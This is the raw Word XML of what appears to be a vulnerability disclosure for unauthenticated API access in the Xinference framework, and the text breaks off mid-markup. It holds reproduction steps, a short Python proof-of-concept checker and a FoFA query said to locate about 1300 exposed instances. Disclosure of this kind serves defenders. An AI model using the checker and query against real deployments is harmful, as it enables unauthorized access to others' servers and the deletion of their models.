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B8E0D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulnerability Name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1282497E">
      <w:r>
        <w:t>The API interface of the Xinference framework has an unauthorized access vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300E32E9"/>
    <w:p w14:paraId="1669E48D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manufacturer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C02AAF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Xinference belongs to Hangzhou Future Speed Technology Co., Ltd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E49647E"/>
    <w:p w14:paraId="0F166CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Xinfer</w:t>
      </w:r>
      <w:r>
        <w:t>ence Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226AA940">
      <w:r>
        <w:t>Xorbits Inference (Xinference) is a powerful and feature-rich distributed inference framework. It can be used for the inference of various models, such as large language models (LLMs), speech recognition models, multimodal models, etc. With Xorbits Inference, you can easily deploy your own models or built-in cutting-edge open-source models with just one click.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B5BAE"/>
    <w:p w14:paraId="76CAB913">
      <w:r>
        <w:t>GitHub：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/xorbitsai/inference" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>https://github.com/xorbitsai/inference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0C1468">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Official Documentation：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://inference.readthedocs.io/zh-cn/latest/index.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>https://inference.readthedocs.io/zh-cn/latest/index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9760C"/>
    <w:p w14:paraId="319B921A">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="41EFA9A7"/>
    <w:p w14:paraId="6AC9647F">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Version:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>All current versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF5DFFF"/>
    <w:p w14:paraId="0A63FE0A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulnerability Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44554CD6">
      <w:r>
        <w:t>When Xinference is deployed using the command "xinference-local --host 0.0.0.0 --port 9997" (other ports are also possible) and with the default configuration, an attacker can access the API of Xinference without authorization. Through accessing the API, the attacker can carry out malicious operations such as accessing sensitive information of the device, cluster information, deleting models, modifying models, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1372F984"/>
    <w:p w14:paraId="2ABD54A8">
      <w:r>
        <w:t>Currently, it has been found that although several versions of Xinference have added the user identity login function, the API interface is still exposed externally, allowing attackers to directly access and exploit it without authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3FD342"/>
    <w:p w14:paraId="7B1C470D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514BDB12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">The relevant APT list can be obtained by accessing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7186D631">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>either </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.56.103:9997/openapi.json" \t "https://www.doubao.com/chat/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://192.168.56.103:9997/openapi.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.56.103:9997/docs" \t "https://www.doubao.com/chat/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://192.168.56.103:9997/docs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4139EF47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F562423">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4809CD0E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulnerability Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD78BD">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6780B2E3">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Deploy Xinference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pip install "xinference[all]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D9406">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD9FBBB">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7962FC24">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Start Xinference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xinference-local --host 0.0.0.0 --port 9997</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1FC421">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C868B23">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0732CFB2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Access the Xinference API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>For example: Access /status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434A982">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A26BC8">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C802E15">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1556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556385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="022E6B57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>/v1/address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5D349">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4566920" cy="10668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590058" cy="1072082"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9A9772"/>
    <w:p w14:paraId="6F8F46AD">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Even list the model list or delete models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE924C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="29260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6080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44498438"/>
    <w:p w14:paraId="33497A04">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Scan using the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58572A20">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192E1ACC">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ython</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> po</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A7191E">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="29514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51480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E20941">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67389B3B">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F02756">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>import requestsimport json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26326583">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t># 定义一个函数，用于检查指定URL的访问情况def check_status_url(url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A8D61">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12323569">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">        # 发送GET请求，对于https协议，设置verify=False表示不验证SSL证书（如果需要验证请设置为True）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38448B8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">        response = requests.get(url, verify=False if url.startswith("https") else True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B413AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">        if response.status_code == 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8482F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">            try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC52DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">                # 尝试将响应内容解析为JSON格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0985B2FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">                json_data = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6840972C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">                print(f"[+] 成功访问 {url}，返回 JSON 内容，可能存在 Xinference 框架 API 接口未授权漏洞。")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FF3C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">                print("返回内容如下：")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5BC2C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">                # 格式化打印JSON数据，缩进为4个空格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1FEB5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">                print(json.dumps(json_data, indent=4))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0305BE5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">                return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFA4CD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">            except json.JSONDecodeError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B08FA93">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">                print(f"[-] 访问 {url} 成功，但返回内容不是有效的 JSON 格式。")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE1A538">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4757718F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">            print(f"[-] 访问 {url} 失败，状态码: {response.status_code}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A936E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">    except requests.RequestException as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E0EFB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(f"[-] 访问 {url} 时发生错误: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE5FEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">    return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162C8AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3085AEDB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 提示用户输入目标URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB249E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">    url = input("请输入目标 URL: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411C67BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">    check_status_url(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F5DB9"/>
    <w:p w14:paraId="3CBB43C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73018252">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Asset Mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>FoFA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F36045">
      <w:r>
        <w:t>title="Xinference"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724BC4AE"/>
    <w:p w14:paraId="1097786E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Approximately 1300 relevant pieces of information can be obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675BD7C7">
      <w:r>
        <w:t>For example:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
